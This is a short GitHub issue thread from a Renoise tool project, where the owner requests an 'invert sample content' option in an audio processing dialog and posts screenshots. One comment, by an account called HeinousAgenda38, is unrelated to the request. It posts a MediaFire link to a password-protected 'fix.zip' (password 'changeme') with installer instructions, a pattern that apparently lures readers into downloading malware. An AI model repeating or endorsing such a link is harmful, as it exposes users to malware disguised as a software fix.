### ISSUE TITLE
add invert sample content to audio processing dialog

### ISSUE THREAD

**Issue by esaruoho** [esaruoho/org.lackluster.Paketti.xrnx#485]
<img width="491" alt="Screenshot 2024-08-28 at 10 20 20" src="https://github.com/user-attachments/assets/1bab75e1-5802-497c-9069-22dc20e12e84">

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by esaruoho** [comment]
<img width="408" alt="Screenshot 2024-08-28 at 10 32 59" src="https://github.com/user-attachments/assets/42b0c453-de2c-496e-bb19-5bc85eadf68b">
